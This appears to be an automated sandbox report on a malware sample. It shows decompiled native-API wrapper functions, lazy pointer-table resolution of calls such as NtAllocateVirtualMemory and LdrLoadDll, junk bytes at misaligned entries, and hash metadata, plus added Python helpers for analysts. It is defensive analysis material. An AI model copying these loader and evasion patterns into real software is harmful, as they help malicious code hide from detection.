                                                                      • Instruction ID: a98a7406c12029d9ee749cf08f82db4afa1096ed533378d37fce299945ad6be1
                                                                      • Opcode Fuzzy Hash: 41847c195b1fad2a2bbbf130035f6ed99413c1a758f743cbd928bf92944a7fcd
                                                                      • Instruction Fuzzy Hash: 21C13AB1F997058BD710CF65E8881A93B71BF84328FD24A08D2626F6D1D7B4146ACFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
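                                                                      The function blocks above repeat the same handful of fields (APIs, Source File, API ID, String ID, Opcode ID, fuzzy hashes, Uniqueness Score) for every function in every dump, which is hard to triage by eye once the listing runs to hundreds of entries. The Python below is an added example, not part of the report: it parses such blocks into records and groups them by memory dump so that, for instance, the image dumped at 0x00400000 from process 6 can be examined apart from the 0x00F50000 region in process 0. The input is an abridged copy of two blocks from this page; the record and function names are this example's own, and treating the bare "Yara matches" heading as a flag is an assumption based on the heading appearing only on some blocks.

```python
# Added example, not part of the report: parse the per-function metadata
# blocks (APIs / Memory Dump Source / Similarity / Uniqueness) into records.
import re
from dataclasses import dataclass, field

# Constructed input: an abridged copy of two blocks from this page.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00F5A516
Strings
Memory Dump Source
• Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
Similarity
• API ID: HandleModule
• String ID: 6NE
• API String ID: 4139908857-2481008274
• Opcode ID: 579eb8f2e7aa6acdbe932b85616de0479cecafc5c2477e275c1d7a1fa7e1d52a
• Instruction Fuzzy Hash: B91102B5C006498FCB20CFAAC444ADEFBF4AB48324F14851AD959B7200D374A549CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
Strings
Memory Dump Source
• Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileRead
• String ID: !:A$b=A$b=A
• API String ID: 2738559852-704622139
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4
Uniqueness

Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(true|false)$")
KV_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[0-9.]+)%$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int            # call-site address from "ref: ..."


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    process: str = ""   # leading dotted field of the dump file name
    offset: int = 0
    based_on_pe: bool = False
    yara: bool = False  # assumption: a bare "Yara matches" heading means the dump had hits
    fields: dict = field(default_factory=dict)
    score: float = 0.0


def parse_blocks(text):
    """Split the listing into FunctionRecords; a block ends at its score line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := SCORE_RE.match(line):
            cur.score = float(m.group(1))
            records.append(cur)
            cur = FunctionRecord()
        elif line == "Yara matches":
            cur.yara = True
        elif m := API_RE.match(line):
            args = m.group(3).split(",") if m.group(3) else []
            cur.apis.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
        elif m := SRC_RE.match(line):
            cur.source_file = m.group(1)
            cur.process = m.group(1).split(".")[0]
            cur.offset = int(m.group(2), 16)
            cur.based_on_pe = m.group(3) == "true"
        elif m := KV_RE.match(line):
            cur.fields[m.group(1)] = m.group(2)
        # section headings (APIs, Strings, Similarity, ...) carry no data
    return records


def group_by_dump(records):
    """Records keyed by (process, dump base address)."""
    groups = {}
    for r in records:
        groups.setdefault((r.process, r.offset), []).append(r)
    return groups


def api_names(records, module=None):
    """Distinct API names referenced, optionally restricted to one module."""
    return sorted({a.name for r in records for a in r.apis
                   if module is None or a.module == module})
```

                                                                      Feeding the whole function listing through parse_blocks and then api_names(records, "NTDLL") gives the set of native calls the dumped image wraps, which is the quickest way to see the thunk layer described in the executed functions below.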

                                                                      Executed Functions

                                                                      C-Code - Quality: 37%
                                                                      			E00418660(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                      				void* _t18;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      
                                                                      				_t13 = _a4;
                                                                      				_t28 = _a4 + 0xc48; // slot in the context's API pointer table (resolver index 0x2a)
                                                                      				E004191B0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // resolve the pointer into the slot, then call through it
                                                                      				_t4 =  &_a40; // 0x413a21
                                                                      				_t6 =  &_a32; // 0x413d62
                                                                      				_t12 =  &_a8; // 0x413d62
                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                      				return _t18;
                                                                      			}

                                                                      Instruction addresses: 0x00418663, 0x0041866f, 0x00418677, 0x0041867c, 0x00418682, 0x0041869d, 0x004186a5, 0x004186a9

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 2738559852-704622139
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 1e9a607f8d7ae55c6529455560845d335dd5ab867efd933cdf95456f7e89143a
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                      				char* _v8;
                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                      				char _v536;
                                                                      				void* _t15;
                                                                      				struct _OBJDIR_INFORMATION _t17;
                                                                      				struct _OBJDIR_INFORMATION _t18;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_v8 =  &_v536; // 0x208-byte buffer: 0x104 wide characters for the module name
                                                                      				_t15 = E0041AF40( &_v12, 0x104, _a8); // fill _v12 (the UNICODE_STRING later handed to LdrLoadDll) from the name at _a8
                                                                      				_t31 = _t30 + 0xc;
                                                                      				if(_t15 != 0) {
                                                                      					_t17 = E0041B360(__eflags, _v8);
                                                                      					_t32 = _t31 + 4;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						E0041B5E0( &_v12, 0);
                                                                      						_t32 = _t32 + 8;
                                                                      					}
                                                                      					_t18 = E004196F0(_v8); // already-loaded lookup: returns a module handle, or 0
                                                                      					_v16 = _t18;
                                                                      					__eflags = _t18;
                                                                      					if(_t18 == 0) {
                                                                      						// not loaded yet: LdrLoadDll(PathToFile = 0, Flags = 0, &ModuleFileName, &ModuleHandle)
                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                      						return _v16;
                                                                      					}
                                                                      					return _t18;
                                                                      				} else {
                                                                      					return _t15;
                                                                      				}
                                                                      			}

                                                                      Instruction addresses: 0x00409b4c, 0x00409b4f, 0x00409b54, 0x00409b59, 0x00409b63, 0x00409b68, 0x00409b6b, 0x00409b6d, 0x00409b75, 0x00409b7a, 0x00409b7a, 0x00409b81, 0x00409b89, 0x00409b8c, 0x00409b8e, 0x00409ba2, 0x00000000, 0x00409ba4, 0x00409baa, 0x00409b5e, 0x00409b5e, 0x00409b5e

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction ID: f32d3288474e01bdfe8324a51b674010449bcf15fd3c95856a6e0addd4ed2bba
                                                                      • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction Fuzzy Hash: 490112B5D0010DA7DF10EBA5DC42FDEB778AB54308F0041A6E918A7281F675EB54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E004185AA(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                      				long _t23;
                                                                      
                                                                      				asm("aaa"); // junk: this entry (0x004185AA) lands mid-instruction; the wrapper proper is E004185B0 below (same ref 004185FD)
                                                                      				_t17 = _a4;
                                                                      				_t4 = _t17 + 0xc40; // 0xc40
                                                                      				E004191B0(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                      				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                      				return _t23;
                                                                      			}

                                                                      Instruction addresses: 0x004185aa, 0x004185b3, 0x004185bf, 0x004185c7, 0x004185fd, 0x00418601

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 4e49a2fd89a072ed91aee9cd768a19d0235fa107ff85c64f88b1ac8d2bbd6ddb
                                                                      • Instruction ID: 18cb8f29c1dbb9be036894fa1e0555e78b2193662c4237a168eb9084fb89eb18
                                                                      • Opcode Fuzzy Hash: 4e49a2fd89a072ed91aee9cd768a19d0235fa107ff85c64f88b1ac8d2bbd6ddb
                                                                      • Instruction Fuzzy Hash: DA01BDB6241208AFDB48DF88DC95EEB77A9AF8C354F158258FA1D97240D630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                      				long _t21;
                                                                      				void* _t31;
                                                                      
                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                      				E004191B0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                      				return _t21;
                                                                      			}

                                                                      Instruction addresses: 0x004185bf, 0x004185c7, 0x004185fd, 0x00418601

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 5d6b5cde0bcb09b7c0358823ed137c5ed8f79ffe5ada1a139c779eb2a876d5e3
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: 00F0B2B2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0041878A(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                                                      				long _t14;
                                                                      				void* _t21;
                                                                      
                                                                      				// junk from a misaligned entry (0x0041878A); the wrapper proper begins at the
                                                                      				// _a8 load (0x00418793) and has the same shape as the NtCreateFile thunk above
                                                                      				asm("aad 0x9d");
                                                                      				asm("daa");
                                                                      				asm("salc");
                                                                      				_pop(ss);
                                                                      				asm("ficom dword [ebp-0x75]");
                                                                      				_t10 = _a8;
                                                                      				_t3 = _t10 + 0xc60; // 0xca0
                                                                      				E004191B0(_t21, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
                                                                      				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                                      				return _t14;
                                                                      			}

                                                                      Instruction addresses: 0x0041878a, 0x0041878c, 0x0041878d, 0x0041878e, 0x0041878f, 0x00418793, 0x0041879f, 0x004187a7, 0x004187c9, 0x004187cd

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 5b9e37ce0a83973ad8b8f99836c60f5d5bb11e8772e47040670453ea2243011c
                                                                      • Instruction ID: 713eb8c923aafab32c3c2070b3ea3110a2081d86b7d44ffaf67b656759256371
                                                                      • Opcode Fuzzy Hash: 5b9e37ce0a83973ad8b8f99836c60f5d5bb11e8772e47040670453ea2243011c
                                                                      • Instruction Fuzzy Hash: D0F058B2200118AFCB24DF99CC81EEB77ADAF8C354F108208FA09A7241C631E910CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
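                                                                      The thunks above (E004185B0, E00418660, E0041878A and, below, E004186DA) all have one shape: pass the context, a slot address inside the context, the value at context+0x10 and a small index to E004191B0, then call the native API through the slot. The (slot offset, index) pairs visible in the decompilation are 0xc40/0x28, 0xc48/0x2a, 0xc50/0x2c and 0xc60/0x30, which fit a table of 4-byte pointers based at context+0xba0. The Python below is an added example, not code from the report or from the sample: it fits that layout to the observed pairs, checks that every pair agrees, and models the resolve-once-then-call behaviour of such a table. The index-to-name map is taken from which native call each thunk makes on this page; the hash function and the fake export table are invented for the illustration and say nothing about the sample's real resolution scheme.

```python
# Added example, not code from the report or the sample: recover the layout of
# the API pointer table that the thunks fill lazily and call through.
from dataclasses import dataclass, field

# (slot offset from the context, index passed to E004191B0), read off the
# four thunks on this page together with the native call each one makes.
OBSERVED = [
    (0xC40, 0x28),  # E004185B0 -> NtCreateFile
    (0xC48, 0x2A),  # E00418660 -> NtReadFile
    (0xC50, 0x2C),  # E004186DA -> NtClose
    (0xC60, 0x30),  # E0041878A -> NtAllocateVirtualMemory
]


def infer_table_layout(pairs):
    """Fit offset = base + stride * index and require every pair to agree.
    Returns (base, stride); raises ValueError if the pairs are not collinear."""
    (o0, i0), (o1, i1) = pairs[0], pairs[1]
    stride, rem = divmod(o1 - o0, i1 - i0)
    if rem or stride <= 0:
        raise ValueError("pairs do not give an integer, positive stride")
    base = o0 - stride * i0
    for off, idx in pairs:
        if base + stride * idx != off:
            raise ValueError(f"pair ({off:#x}, {idx:#x}) does not fit the line")
    return base, stride


def index_for_slot(offset, layout):
    """Inverse: which resolver index a thunk that uses ctx+offset asks for."""
    base, stride = layout
    idx, rem = divmod(offset - base, stride)
    if rem or idx < 0:
        raise ValueError(f"{offset:#x} is not a table slot")
    return idx


def fnv1a(name):
    """Stand-in name hash; the sample's real resolution scheme is not on the page."""
    h = 0x811C9DC5
    for b in name.encode():
        h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
    return h


# Hypothetical index -> export name map, populated from the calls seen above.
INDEX_NAMES = {0x28: "NtCreateFile", 0x2A: "NtReadFile",
               0x2C: "NtClose", 0x30: "NtAllocateVirtualMemory"}


@dataclass
class ApiTable:
    """Model of the per-context table: a slot is resolved on first use (the
    role E004191B0 plays in the thunks) and every later call goes straight
    through the cached pointer."""
    exports: dict                          # name -> callable (fake ntdll)
    slots: dict = field(default_factory=dict)
    resolve_calls: int = 0

    def resolve(self, index):
        if index not in self.slots:
            self.resolve_calls += 1
            want = fnv1a(INDEX_NAMES[index])
            self.slots[index] = next(fn for n, fn in self.exports.items()
                                     if fnv1a(n) == want)
        return self.slots[index]

    def call(self, index, *args):
        return self.resolve(index)(*args)


def demo():
    """Two NtReadFile calls and one NtClose call resolve only two slots."""
    fake = {"NtReadFile": lambda h, n: f"read {n} from {h}",
            "NtClose": lambda h: f"closed {h}"}
    t = ApiTable(fake)
    out = (t.call(0x2A, "h1", 16), t.call(0x2A, "h2", 32), t.call(0x2C, "h1"))
    return out, t.resolve_calls
```

                                                                      With the layout known, any further thunk in the dump can be labelled from its slot offset alone: index_for_slot(0xC58, layout) gives 0x2e, so a thunk using ctx+0xc58 asks the resolver for the entry between NtClose and NtAllocateVirtualMemory, and a breakpoint on E004191B0 with that index in hand shows which export it fetches.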

                                                                      C-Code - Quality: 85%
                                                                      			E004186DA(void* __edx, void* __eflags, long _a4, void* _a8) {
                                                                      				intOrPtr _v117;
                                                                      				long* __esi;
                                                                      				signed char _t6;
                                                                      				void* _t11;
                                                                      
                                                                      				// junk from a misaligned entry (0x004186DA); the NtClose wrapper proper is the
                                                                      				// else branch from __ebp = __esp onwards (slot ctx+0xc50, resolver index 0x2c)
                                                                      				asm("int 0xe7");
                                                                      				asm("std");
                                                                      				if(__eflags < 0) {
                                                                      					return  *(_t6 | 0x0000008b)(__edx, es, _t11);
                                                                      				} else {
                                                                      					__eflags = __edx - _v117;
                                                                      					__ebp = __esp;
                                                                      					__eax = _a4;
                                                                      					_t3 = __eax + 0x10; // 0x300
                                                                      					_t4 = __eax + 0xc50; // 0x409753
                                                                      					__esi = _t4;
                                                                      					__eax = E004191B0(__edi, _a4, __esi,  *_t3, 0, 0x2c);
                                                                      					__edx = _a8;
                                                                      					__eax =  *__esi;
                                                                      					__eax = NtClose(_a8); // executed
                                                                      					__esi = __esi;
                                                                      					__ebp = __ebp;
                                                                      					return __eax;
                                                                      				}
                                                                      			}

                                                                      Instruction addresses: 0x004186da 0x004186dc 0x004186dd 0x004186d9 0x004186df 0x004186df 0x004186e1 0x004186e3 0x004186e6 0x004186ef 0x004186ef 0x004186f7 0x004186fc 0x004186ff 0x00418705 0x00418707 0x00418708 0x00418709 0x00418709

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: d0a7aa98471bfcbc65870662297c25ead3115f6c031485053a1f14affa10e6b5
                                                                      • Instruction ID: 1851d21db6e1e0e433705d8b9bc6f96ef1dce32e760053031ea60e7465d993b7
                                                                      • Opcode Fuzzy Hash: d0a7aa98471bfcbc65870662297c25ead3115f6c031485053a1f14affa10e6b5
                                                                      • Instruction Fuzzy Hash: 41E068722001007BDB10EBE8DC85EEB772CDF84354F11416EF90CE7202CA30E2408AE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                      				long _t14;
                                                                      				void* _t21;
                                                                      
                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                      				E004191B0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                      				return _t14;
                                                                      			}

                                                                      Instruction addresses: 0x0041879f 0x004187a7 0x004187c9 0x004187cd

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: dde6359f0c5cf0f3b7cc61d53361d99b03a052e7ad6e115d9fdbfc5a6ee34577
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: C2F015B2200208ABDB14DF89CC81EEB77ADAF88754F158149FE0997241C630F810CBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004186E0(intOrPtr _a4, void* _a8) {
                                                                      				long _t8;
                                                                      				void* _t11;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                      				_t3 = _t5 + 0xc50; // 0x409753
                                                                      				E004191B0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                      				_t8 = NtClose(_a8); // executed
                                                                      				return _t8;
                                                                      			}

                                                                      Instruction addresses: 0x004186e3 0x004186e6 0x004186ef 0x004186f7 0x00418705 0x00418709

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 25afffe72521d28b4007e715134bc6c20f47cbfe06c74e166365dbb6af139879
                                                                      • Instruction ID: 3e3eb30c84c1f52af5b5bcfee0fd4074d807672661d225df099459ff4fafb94d
                                                                      • Opcode Fuzzy Hash: 25afffe72521d28b4007e715134bc6c20f47cbfe06c74e166365dbb6af139879
                                                                      • Instruction Fuzzy Hash: 869002B124100402D544719955047460005A7D0341F51C015A5055558EC7998DD576A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b4cdda2aa31ff7b28b52f83b4441c6897ed54cddb45e6f9f085163f6334c765
                                                                      • Instruction ID: 51cbe4d735e5660d05b78bc75e42dd72d371dc90a73732495ed7fd3ee60755be
                                                                      • Opcode Fuzzy Hash: 7b4cdda2aa31ff7b28b52f83b4441c6897ed54cddb45e6f9f085163f6334c765
                                                                      • Instruction Fuzzy Hash: 3990047535100003050DF5DD17045070047F7D53D1751C035F1007554CD771CC717171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fd2849c5b28d2fe08e2d5d1d3b9c61c0adaa077730aa1d02a6aa1dc9354a3baa
                                                                      • Instruction ID: 3efe2f1641941bf64de89da6607a82505fd9c11ac27b9d39a10deb667364824c
                                                                      • Opcode Fuzzy Hash: fd2849c5b28d2fe08e2d5d1d3b9c61c0adaa077730aa1d02a6aa1dc9354a3baa
                                                                      • Instruction Fuzzy Hash: 639002A138100442D50461995514B060005E7E1341F51C019E1055558DC759CC527166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bba1b913f83b0d347774db24200788a6c63e5a3e8ea47638b0ba5eaf95ae4264
                                                                      • Instruction ID: 880fad00d18b468f28943e07e1c302c589ba21a345a1c6d24db303e4dc106b79
                                                                      • Opcode Fuzzy Hash: bba1b913f83b0d347774db24200788a6c63e5a3e8ea47638b0ba5eaf95ae4264
                                                                      • Instruction Fuzzy Hash: BA9002A124200003450971995514616400AA7E0241F51C025E1005594DC66588917165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 4d495e8d81ed6fff5db6538328fa64c1fcdbabe48c9d2e15eda14830ef170b00
                                                                      • Instruction ID: 2015e1de2dcf8862aeb40ce98603afcf36002fe7d69385713d02d9351cc7d1a5
                                                                      • Opcode Fuzzy Hash: 4d495e8d81ed6fff5db6538328fa64c1fcdbabe48c9d2e15eda14830ef170b00
                                                                      • Instruction Fuzzy Hash: BD900261282041525949B19955045074006B7E0281B91C016A1405954CC6669856E661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0cf6d1f20dcb04d75c1cf36a96f3a496d67b3e3ce105c9a47c59df17d004b152
                                                                      • Instruction ID: 0a478a90c8f7b48f79563ab7ca2ccf3b327f3f1ff8464402d4574650af89506f
                                                                      • Opcode Fuzzy Hash: 0cf6d1f20dcb04d75c1cf36a96f3a496d67b3e3ce105c9a47c59df17d004b152
                                                                      • Instruction Fuzzy Hash: 8890027124100413D515619956047070009A7D0281F91C416A041555CDD7968952B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c240a61e67e599136af3cd83fd87e93d15f4150f1ba05aa1097a8deb78143c57
                                                                      • Instruction ID: bb7443d3b8a4bab36aa165f563659b0ac0362f582f4c3e357ecc46f58cb9c9ae
                                                                      • Opcode Fuzzy Hash: c240a61e67e599136af3cd83fd87e93d15f4150f1ba05aa1097a8deb78143c57
